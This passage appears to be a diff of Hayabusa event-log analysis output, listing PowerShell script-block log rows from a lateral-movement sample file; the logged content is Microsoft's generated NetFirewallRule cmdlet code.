Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSet",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetFirewallRule' -Alias '*' function Copy-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Name='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuild",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Name='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not 